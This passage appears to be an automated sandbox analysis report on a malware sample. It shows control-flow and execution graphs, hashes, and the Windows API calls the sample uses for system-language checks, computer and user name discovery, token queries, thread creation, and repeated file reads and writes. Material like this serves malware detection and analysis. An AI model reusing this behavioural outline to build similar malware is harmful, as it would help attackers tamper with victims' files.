                                                                                                                                                                      • Instruction Fuzzy Hash: 300126F0B1EEB0CFD61BE718700227A6152B795334FE8419B904AC7292C83C4D82938F
                                                                                                                                                                      Function 00428090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 507 428090-428096 508 428184 507->508 509 42813c-4281a5 507->509 510 428186 CloseHandle 508->510 511 42818c-428192 508->511 522 4281a7 509->522 523 4281bd-4281ca 509->523 510->511 513 428194 511->513 514 428115-428118 511->514 513->514 517 42819a 513->517 515 4280a7 514->515 516 428119-42811a 514->516 516->515 520 42811c 516->520 517->509 521 42820f 520->521 524 428215-42821e 521->524 525 42808e-428096 521->525 528 4280f3 523->528 529 4281d0 523->529 524->525 532 428224 524->532 525->508 530 4280f5 528->530 531 42808c 528->531 539 4280c3 529->539 540 4281fe-428201 GetTokenInformation 529->540 530->531 542 428077 530->542 531->525 536 428226 532->536 537 4281d7-4281e6 call 45715c 532->537 536->537 538 428228-4282ee call 425d90 536->538 548 4280ca-42810f GetTokenInformation 537->548 559 428089 537->559 563 4282f0 538->563 564 42830c-428320 call 425d90 call 42ec00 538->564 539->540 544 4280c9 539->544 540->521 551 4281b7 540->551 542->537 544->548 556 428111 548->556 557 42812d 548->557 551->521 555 4281b9-4281bb 551->555 555->523 556->557 560 428113 556->560 561 428133-4281f0 557->561 562 4280a8 557->562 559->548 565 42808b 559->565 560->514 574 4281f6 561->574 575 4280da-4280f1 561->575 566 4280aa-4280ad 562->566 563->564 569 4282f2 563->569 570 4282f7-4282fc call 425d90 564->570 594 428322 564->594 565->531 572 428163-428170 call 457164 566->572 573 4280b3-428203 566->573 569->570 586 428302 570->586 587 428253-428265 call 441280 570->587 572->510 588 428172 572->588 573->572 581 428209 573->581 574->575 580 4281fc 574->580 575->566 580->540 586->587 590 428308-42830a 586->590 597 42826b 587->597 598 428328 587->598 588->511 590->564 594->570 596 428324-428326 594->596 596->598 597->598 601 42823f-428243 597->601 602 428335 598->602 603 4282df-42832b 598->603 601->570 606 428287 602->606 607 42829b-42829d 602->607 603->602 608 42832d-428331 603->608 606->607 610 42824e-428252 606->610 608->602 610->587
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 7a56fbfbeaf37c7a3436b851283f21cc1175aee4b15bc53802576e08adf2423e
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 1BC08C7033B87A96B23802483C0B0BE66408202351BCC000F8C02C23E0DD0C8E73109F
                                                                                                                                                                      Function 0042817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 611 42817f 612 428184 611->612 613 428186 CloseHandle 612->613 614 42818c-428192 612->614 613->614 615 428194 614->615 616 428115-428118 614->616 615->616 619 42819a-4281a5 615->619 617 4280a7 616->617 618 428119-42811a 616->618 618->617 620 42811c 618->620 630 4281a7 619->630 631 4281bd-4281ca 619->631 622 42820f 620->622 624 428215-42821e 622->624 625 42808e-428096 622->625 624->625 629 428224 624->629 625->612 632 428226 629->632 633 4281d7-4281e6 call 45715c 629->633 637 4280f3 631->637 638 4281d0 631->638 632->633 635 428228-4282ee call 425d90 632->635 654 4280ca-42810f GetTokenInformation 633->654 655 428089 633->655 659 4282f0 635->659 660 42830c-428320 call 425d90 call 42ec00 635->660 641 4280f5 637->641 642 42808c 637->642 650 4280c3 638->650 651 4281fe-428201 GetTokenInformation 638->651 641->642 652 428077 641->652 642->625 650->651 656 4280c9 650->656 651->622 668 4281b7 651->668 652->633 662 428111 654->662 663 42812d 654->663 655->654 661 42808b 655->661 656->654 659->660 666 4282f2 659->666 667 4282f7-4282fc call 425d90 660->667 697 428322 660->697 661->642 662->663 669 428113 662->669 671 428133-4281f0 663->671 672 4280a8 663->672 666->667 684 428302 667->684 685 428253-428265 call 441280 667->685 668->622 674 4281b9-4281bb 668->674 669->616 682 4281f6 671->682 683 4280da-4280f1 671->683 675 4280aa-4280ad 672->675 674->631 679 428163-428170 call 457164 675->679 680 4280b3-428203 675->680 679->613 696 428172 679->696 680->679 690 428209 680->690 682->683 689 4281fc 682->689 683->675 684->685 691 428308-42830a 684->691 700 42826b 685->700 701 428328 685->701 689->651 691->660 696->614 697->667 699 428324-428326 697->699 699->701 700->701 705 42823f-428243 700->705 706 428335 701->706 707 4282df-42832b 701->707 705->667 710 428287 706->710 711 42829b-42829d 706->711 707->706 712 42832d-428331 707->712 710->711 714 42824e-428252 710->714 712->706 714->685
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 10b65ee38fa1589f91d027178714526807b1d27bab61ba9775247bb161552a60
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC048A076B52986A13826883C0A4BAA5908612761F88441BAD068B3E2D95C4DA351AE

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:8.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.2%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:240
                                                                                                                                                                      Total number of Limit Nodes:29
                                                                                                                                                                      execution_graph 10681 895b09 10682 895b16 10681->10682 10683 895cdf CreateThread 10682->10683 10684 895c01 10682->10684 10683->10682 10683->10684 10685 8954a0 10683->10685 10684->10684 10693 89810e 10696 898075 10693->10696 10698 8980a7 10693->10698 10694 898186 CloseHandle 10694->10696 10695 8980ca GetTokenInformation 10695->10696 10696->10694 10696->10695 10697 8981ad GetTokenInformation 10696->10697 10696->10698 10697->10696 10388 895b00 10389 895bba 10388->10389 10396 8a52c0 10389->10396 10391 895bc7 10395 895bde 10391->10395 10401 8b0080 10391->10401 10397 8a52c6 10396->10397 10400 8a52ce 10396->10400 10397->10400 10415 89e050 10397->10415 10400->10391 10407 8b0089 10401->10407 10402 8b03e0 GetComputerNameW 10402->10407 10403 8b0181 VirtualFree 10403->10407 10404 89e050 VirtualAlloc 10404->10407 10405 8b03bf GetUserNameW 10405->10407 10406 8b04d6 GetComputerNameW 10406->10407 10407->10402 10407->10403 10407->10404 10407->10405 10407->10406 10408 895c7b 10407->10408 10409 898070 10408->10409 10413 898075 10409->10413 10410 898186 CloseHandle 10410->10413 10411 8981ad GetTokenInformation 10411->10413 10412 8980ca GetTokenInformation 10412->10413 10413->10410 10413->10411 10413->10412 10414 8980a7 10413->10414 10414->10395 10416 89e0c3 10415->10416 10417 89e0d8 VirtualAlloc 10416->10417 10417->10416 10704 899103 10705 899108 10704->10705 10706 89031d 10705->10706 10707 899169 VirtualFree 10705->10707 10706->10706 10707->10705 10440 895b87 CreateThread 10442 895b1c 10440->10442 10445 895810 10440->10445 10441 895cdf CreateThread 10441->10442 10443 895c01 10441->10443 10444 8954a0 10441->10444 10442->10441 10442->10443 10443->10443 10446 895822 10445->10446 10599 89a418 10600 89a413 10599->10600 10602 89a3df 10599->10602 10601 89a5ba SetFilePointerEx 10601->10602 10602->10600 10602->10601 10655 89a39d 10656 89a5ba SetFilePointerEx 10655->10656 10657 89a3df 10656->10657 10657->10656 10658 89a413 10657->10658 10560 898090 10565 898075 10560->10565 10561 898186 CloseHandle 10561->10565 10562 8980ca GetTokenInformation 10562->10565 10563 8981ad GetTokenInformation 10563->10565 10564 8980a7 10565->10561 10565->10562 10565->10563 10565->10564 10452 89a697 ReadFile 10453 89a6a9 10452->10453 10454 899316 10455 8993dd ReadFile 10454->10455 10456 8993f1 10455->10456 10458 899108 10455->10458 10457 899169 VirtualFree 10457->10458 10458->10457 10459 89031d 10458->10459 10603 899a29 10604 8999ea 10603->10604 10605 89cdd0 2 API calls 10604->10605 10607 899b29 10605->10607 10606 899d69 10608 899d73 VirtualFree 10606->10608 10607->10606 10610 89cdd0 2 API calls 10607->10610 10609 899d75 10608->10609 10610->10606 10460 8994ab SetFilePointerEx 10462 8994c4 10460->10462 10461 89973c SetFilePointerEx 10461->10462 10462->10461 10463 899508 VirtualFree 10462->10463 10464 8994ca wcscat 10462->10464 10463->10462 10469 898a2f 10473 8987eb 10469->10473 10470 8989d7 WriteFile 10470->10473 10472 898da5 SetFilePointerEx 10472->10473 10473->10470 10473->10472 10474 898937 10473->10474 10476 89ca20 10473->10476 10481 899c50 10473->10481 10477 89ca42 10476->10477 10478 89cc97 VirtualFree 10477->10478 10479 89ca8e WriteFile 10477->10479 10480 89cc63 10477->10480 10478->10477 10479->10477 10480->10473 10485 899c7b 10481->10485 10482 899d75 10482->10473 10483 899d69 10484 899d73 VirtualFree 10483->10484 10484->10482 10485->10482 10485->10483 10487 89cdd0 10485->10487 10489 89cf4d 10487->10489 10488 89d225 SetFilePointerEx 10488->10489 10489->10488 10490 89cfca 10489->10490 10491 89d25c WriteFile 10489->10491 10490->10483 10491->10489 10492 89872e 10493 898852 10492->10493 10494 8987c6 SetFilePointerEx 10493->10494 10498 8987eb 10493->10498 10499 898937 10493->10499 10494->10498 10495 898da5 SetFilePointerEx 10495->10498 10496 8989d7 WriteFile 10496->10498 10497 899c50 3 API calls 10497->10498 10498->10495 10498->10496 10498->10497 10498->10499 10500 89ca20 2 API calls 10498->10500 10500->10498 10566 8990ae 10568 899108 10566->10568 10567 899169 VirtualFree 10567->10568 10568->10567 10569 89031d 10568->10569 10708 898921 10712 8987eb 10708->10712 10709 8989d7 WriteFile 10709->10712 10710 898da5 SetFilePointerEx 10710->10712 10711 899c50 3 API calls 10711->10712 10712->10708 10712->10709 10712->10710 10712->10711 10713 898937 10712->10713 10714 89ca20 2 API calls 10712->10714 10714->10712 10501 89ada0 10502 89adb1 10501->10502 10503 89aa64 ReadFile 10501->10503 10502->10503 10504 89aa72 10502->10504 10503->10504 10659 898da0 SetFilePointerEx 10662 8987eb 10659->10662 10660 8989d7 WriteFile 10660->10662 10661 899c50 3 API calls 10661->10662 10662->10660 10662->10661 10663 898da5 SetFilePointerEx 10662->10663 10664 898937 10662->10664 10665 89ca20 2 API calls 10662->10665 10663->10662 10665->10662 10510 89a5b9 SetFilePointerEx 10512 89a3df 10510->10512 10511 89a5ba SetFilePointerEx 10511->10512 10512->10511 10513 89a413 10512->10513 10521 89a43c WriteFile 10523 89a3df 10521->10523 10522 89a413 10523->10522 10524 89a5ba SetFilePointerEx 10523->10524 10524->10523 10525 89893f 10526 89875e 10525->10526 10527 898e8a 10526->10527 10528 899019 SetFilePointerEx 10526->10528 10529 899024 10528->10529 10530 8981b1 10535 898075 10530->10535 10531 898186 CloseHandle 10531->10535 10532 8980a7 10533 8981ad GetTokenInformation 10533->10535 10534 8980ca GetTokenInformation 10534->10535 10535->10531 10535->10532 10535->10533 10535->10534 10570 8952b7 10571 8952b0 10570->10571 10572 8952c4 10570->10572 10572->10571 10573 8953c4 GetSystemDefaultLangID 10572->10573 10574 895475 10573->10574 10721 898340 10724 898348 wcscat 10721->10724 10722 89834e 10723 89e050 VirtualAlloc 10723->10724 10724->10722 10724->10723 10428 895b42 10430 895b07 10428->10430 10430->10428 10432 895bb4 10430->10432 10433 895b68 10430->10433 10434 8952a0 10430->10434 10431 895cdf CreateThread 10431->10432 10431->10433 10438 8954a0 10431->10438 10432->10431 10432->10433 10437 8952ab 10434->10437 10435 8953c4 GetSystemDefaultLangID 10436 8952b0 10435->10436 10436->10430 10437->10435 10437->10436 10439 8954b5 10438->10439 10725 895347 10728 8952cb 10725->10728 10726 8953c4 GetSystemDefaultLangID 10727 895475 10726->10727 10728->10726 10729 8952b0 10728->10729 10730 898758 10734 8987eb 10730->10734 10731 8989d7 WriteFile 10731->10734 10732 899c50 3 API calls 10732->10734 10733 898da5 SetFilePointerEx 10733->10734 10734->10731 10734->10732 10734->10733 10735 898937 10734->10735 10736 89ca20 2 API calls 10734->10736 10736->10734 10627 89945f 10629 899450 10627->10629 10628 89973c SetFilePointerEx 10628->10629 10629->10628 10630 899508 VirtualFree 10629->10630 10631 899521 wcscat __free_lconv_mon 10629->10631 10630->10629 10666 8955ef 10669 8955ac 10666->10669 10667 8b3870 VirtualAlloc 10667->10669 10668 8955e9 10669->10667 10669->10668 10637 895860 10638 8a52c0 VirtualAlloc 10637->10638 10639 895869 10638->10639 10640 8b0080 5 API calls 10639->10640 10641 89587d 10640->10641 10642 898070 3 API calls 10641->10642 10643 895870 10642->10643 10737 898762 10738 899019 SetFilePointerEx 10737->10738 10739 899024 10738->10739 10670 8955e4 10672 8955ac 10670->10672 10671 8b3870 VirtualAlloc 10671->10672 10672->10670 10672->10671 10673 8955e9 10672->10673 10580 89a4f8 10583 89a3df 10580->10583 10581 89a5ba SetFilePointerEx 10581->10583 10582 89a413 10583->10581 10583->10582 10514 89907b 10518 8987eb 10514->10518 10515 899c50 3 API calls 10515->10518 10516 8989d7 WriteFile 10516->10518 10517 898da5 SetFilePointerEx 10517->10518 10518->10515 10518->10516 10518->10517 10519 898937 10518->10519 10520 89ca20 2 API calls 10518->10520 10520->10518 10584 89a6fe 10585 89a72f 10584->10585 10586 89a6af SetFilePointerEx 10585->10586 10587 89a6c7 10585->10587 10586->10587 10536 8960f0 10538 8960f6 10536->10538 10537 896123 SetFilePointerEx 10537->10538 10538->10537 10539 89612d 10538->10539 10540 896103 ReadFile 10538->10540 10540->10538 10541 8957f0 10542 8955ac 10541->10542 10544 8955e9 10542->10544 10545 8b3870 10542->10545 10546 8b3876 10545->10546 10548 8b3893 10546->10548 10549 8b3720 10546->10549 10548->10542 10551 8a0c42 10549->10551 10550 89e050 VirtualAlloc 10550->10551 10551->10549 10551->10550 10552 8b37dd 10551->10552 10552->10548 10552->10552 10588 8952f4 10591 8952cb 10588->10591 10589 8952b0 10590 8953c4 GetSystemDefaultLangID 10590->10589 10591->10589 10591->10590

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00898789 Relevance: 2.8, APIs: 1, Instructions: 1311COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e6ace8c27580d51c4d6788a91f16e1abf6f92432227aa06c17b5d7ed2c99a3de
                                                                                                                                                                      • Instruction ID: 378f2796b32eb08d801488e2b7f4dcc0232d3ae6142785d79dddcd81370c7609
                                                                                                                                                                      • Opcode Fuzzy Hash: e6ace8c27580d51c4d6788a91f16e1abf6f92432227aa06c17b5d7ed2c99a3de
                                                                                                                                                                      • Instruction Fuzzy Hash: 95726932528E0E8BCB2CAF589C476B4B6D1F795310F9C836FD846C33A6DE78954586C2
                                                                                                                                                                      Function 0089CA20 Relevance: 2.2, APIs: 1, Instructions: 687COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f314e44e71bfe467635a20a0ad728ef6200802aa520895d640594c65b3759962
                                                                                                                                                                      • Instruction ID: 435514f7062a52ec1645c59b3fa99eadc6aa448b01a22f1a42f6dd23a23a02b0
                                                                                                                                                                      • Opcode Fuzzy Hash: f314e44e71bfe467635a20a0ad728ef6200802aa520895d640594c65b3759962
                                                                                                                                                                      • Instruction Fuzzy Hash: FE02052170CB4C4FCB69AB2C58552FA7BD1FB9A324F5841AEE04BC7396DD258C06C386
                                                                                                                                                                      Function 008952A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1211 8952a0-8952a5 1212 8952ab-8952f5 1211->1212 1213 89532e-89533f 1211->1213 1212->1213 1216 8952f7-8953fe 1212->1216 1217 89536b-89536f 1213->1217 1221 8d0d4c-8d0d4e 1216->1221 1222 895400-895424 1216->1222 1219 895441-89544a 1217->1219 1220 895375-895390 1217->1220 1233 895450 1219->1233 1234 8953c4-8953ca GetSystemDefaultLangID 1219->1234 1228 8953c3 1220->1228 1229 895392-89539a 1220->1229 1225 89539b 1222->1225 1226 89542a 1222->1226 1230 89539d-8953a1 1225->1230 1231 895413-895419 1225->1231 1226->1225 1232 895430-89543e 1226->1232 1229->1225 1235 8952b0-8952b5 1230->1235 1236 8953a7 1230->1236 1232->1219 1243 895411 1233->1243 1244 8953c1 1233->1244 1237 895475-89547b 1234->1237 1236->1235 1239 8953ad 1236->1239 1237->1221 1241 8953af-8953f1 1239->1241 1242 8953f3-8953f9 1239->1242 1241->1231 1241->1242 1248 89532a 1242->1248 1249 895355 1242->1249 1243->1231 1243->1234 1244->1228 1244->1243 1248->1249 1250 89532c 1248->1250 1252 8952e8-895363 1249->1252 1253 8952d1-8952e7 1249->1253 1250->1213 1256 8953d1-8953d5 1252->1256 1257 895365 1252->1257 1253->1252 1256->1230 1258 8953d7 1256->1258 1257->1256 1259 895367-895369 1257->1259 1258->1222 1261 89534b 1258->1261 1259->1217 1261->1222 1262 895351-895353 1261->1262 1262->1249
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 008953C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 2a6c15edf7c8c9812c0b5dac075b320166582ad0e518f84b31c7f152f2ccffc6
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: B441E59150DE998FDF27736448642707BA0FB233E6F9D04D7D487CB2E2E1984C81A76A
                                                                                                                                                                      Function 0089945F Relevance: 9.5, APIs: 6, Instructions: 476COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 32a1346f689ca69e6c1817ad9c6502fc2abb1573d67bc5450444cb3875e0a70e
                                                                                                                                                                      • Instruction ID: 3b66abf7a193348aae3283a1fdeb68d7413b3dd9fbdace022b799ca7d4290d60
                                                                                                                                                                      • Opcode Fuzzy Hash: 32a1346f689ca69e6c1817ad9c6502fc2abb1573d67bc5450444cb3875e0a70e
                                                                                                                                                                      • Instruction Fuzzy Hash: EFD1393051CB48CFDF3AAB2C94516B67BA0FB66328F2C059ED087C7662DA298C41D353
                                                                                                                                                                      Function 008B0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 202 8b0080-8b0286 204 8b0099-8b0575 202->204 205 8b028c 202->205 209 8b057b 204->209 210 8b0155 204->210 206 8b0445 205->206 206->204 208 8b044b-8b0457 206->208 212 8b0458-8b0472 GetComputerNameW 208->212 209->210 213 8b0581-8b0587 209->213 211 8b02ef-8b0495 call 89e050 * 2 210->211 211->212 254 8b043e 211->254 217 8b03ee-8b03f4 212->217 218 8b024c-8b0253 212->218 215 8b058b 213->215 220 8b058c-8b0591 215->220 221 8b0181 VirtualFree 215->221 241 8b00da-8b023f 217->241 242 8b03fa 217->242 225 8b01e6 218->225 226 8b0255 218->226 223 8b04ab-8b04af 220->223 224 8b0597 220->224 222 8b01a8-8b02ac call 8c7164 221->222 231 8b02b1-8b02be 222->231 251 8b04c7 223->251 224->223 233 8b059d 224->233 230 8b01ec-8b0313 call 8c715c 225->230 225->231 234 8b02d3 226->234 257 8b0318-8b031e 230->257 237 8b03bf-8b03d9 GetUserNameW 231->237 238 8b02c4 231->238 233->223 234->225 240 8b02d9 234->240 246 8b0331 237->246 238->237 247 8b02ca 238->247 240->211 241->218 255 8b0241-8b024a 241->255 242->241 248 8b0400 242->248 252 8b0171 246->252 253 8b0337 246->253 247->234 256 8bb1ee-8bb49f 248->256 263 8b04cc-8b04e6 call 8c9970 GetComputerNameW 251->263 258 8b013f-8b0146 252->258 259 8b0173 252->259 253->252 260 8b033d 253->260 254->206 255->218 255->231 261 8b0568-8b056b 257->261 262 8b0324 257->262 258->215 265 8b0230 259->265 266 8b05d0-8b05d9 260->266 261->263 262->261 268 8b032a 262->268 271 8b04ec-8b0514 263->271 272 8b0131 263->272 265->251 270 8b0236-8b05c2 265->270 266->256 268->246 270->251 276 8b05c8-8b05c9 270->276 271->261 274 8b0089-8b008c 272->274 275 8b0137 272->275 274->222 278 8b0092 274->278 275->274 279 8b013d 275->279 276->266 278->222 280 8b0098 278->280 279->221 279->258 280->204
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: aae9ce643ec60b6bbaf6f3d4054fc9884d16932a80ec6400ece074ac0af679f5
                                                                                                                                                                      • Instruction ID: 10862f6c7573f2bb94b889e2e11751930e7895474883e20c8d50b6159cd23d34
                                                                                                                                                                      • Opcode Fuzzy Hash: aae9ce643ec60b6bbaf6f3d4054fc9884d16932a80ec6400ece074ac0af679f5
                                                                                                                                                                      • Instruction Fuzzy Hash: E5D1F231418F0D8BCB28EF58D8497EBB7E1FBA0314F18461FD846C7265DA74DA498AC2
                                                                                                                                                                      Function 00898070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 281 898070-89817e 283 89813d-8981a5 281->283 284 898180 281->284 297 8981bd-8981ca 283->297 298 8981a7 283->298 285 89815f 284->285 286 898184 284->286 285->283 288 898161 285->288 289 89818c-898192 286->289 290 898186 CloseHandle 286->290 292 898163-898170 call 8c7164 288->292 293 898115-898118 289->293 294 898194 289->294 290->289 292->290 306 898172 292->306 295 898119-89811a 293->295 296 8980a7 293->296 294->293 300 89819a 294->300 295->296 301 89811c 295->301 309 8981d0 297->309 310 8980f3 297->310 303 89813c 300->303 304 89820f 301->304 303->286 307 89808e-898096 304->307 308 898215-89821e 304->308 306->289 307->286 307->296 308->307 320 898224 308->320 317 8981fe-898201 GetTokenInformation 309->317 318 8980c3 309->318 311 89808c 310->311 312 8980f5 310->312 311->307 312->311 319 898077 312->319 317->304 330 8981b7 317->330 318->317 322 8980c9 318->322 323 8981d7-8981de call 8c715c 319->323 320->323 324 898226 320->324 326 8980ca-8980d8 GetTokenInformation 322->326 332 8981e3-8981e6 323->332 324->323 327 898228-8982ee call 895d90 324->327 329 89810f 326->329 347 89830c-89831e call 895d90 327->347 348 8982f0 327->348 335 89812d 329->335 336 898111 329->336 330->304 333 8981b9-8981bb 330->333 332->326 345 898089 332->345 333->297 340 8980a8 335->340 341 898133 335->341 336->335 342 898113 336->342 346 8980aa-8980ad 340->346 341->303 344 8981ed-8981f0 341->344 342->293 350 8980da-8980f1 344->350 351 8981f6 344->351 345->326 349 89808b 345->349 346->292 352 8980b3-898203 346->352 362 8982a6-898320 call 89ec00 347->362 348->347 355 8982f2 348->355 349->311 350->346 351->350 353 8981fc 351->353 352->292 357 898209 352->357 353->317 358 8982f7-8982fc call 895d90 355->358 366 898253-898265 call 8b1280 358->366 367 898302 358->367 362->358 373 898322 362->373 374 898328 366->374 375 89826b 366->375 367->366 370 898308-89830a 367->370 370->347 373->358 376 898324-898326 373->376 380 8982df-89832b 374->380 381 898335 374->381 375->374 379 89823f-898243 375->379 376->374 379->358 380->381 386 89832d-898331 380->386 384 89829b-89829d 381->384 385 898287 381->385 385->384 388 89824e-898252 385->388 386->381 388->366
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5fb13a04a7e6046ff5e94998b1f76451cb875e9ea96bffb944b4f01765a37091
                                                                                                                                                                      • Instruction ID: 50381fc56232b9b84b3b167dc1d46417445747ac318a92d7b92f80656cb7360f
                                                                                                                                                                      • Opcode Fuzzy Hash: 5fb13a04a7e6046ff5e94998b1f76451cb875e9ea96bffb944b4f01765a37091
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A61FF3160CE4BDFCF65BB6888186357AA0FB57354F6C025AE447C32A1DF349C499752
                                                                                                                                                                      Function 0089872E Relevance: 3.2, APIs: 2, Instructions: 196COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 008987C9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: adbb1face1e5ee7e72f77b9d0f087f771b3fd543e3cc8a97d35552ba232f820e
                                                                                                                                                                      • Instruction ID: 556a2fb10f1d8b52bc976f5df5dc464e9d1dd412a230197cbe1585497102d1bc
                                                                                                                                                                      • Opcode Fuzzy Hash: adbb1face1e5ee7e72f77b9d0f087f771b3fd543e3cc8a97d35552ba232f820e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8351B23050C78ACFDF65AB689811375BBE1FB93318F2C46ABD096D7192DE358C468712
                                                                                                                                                                      Function 008960F0 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
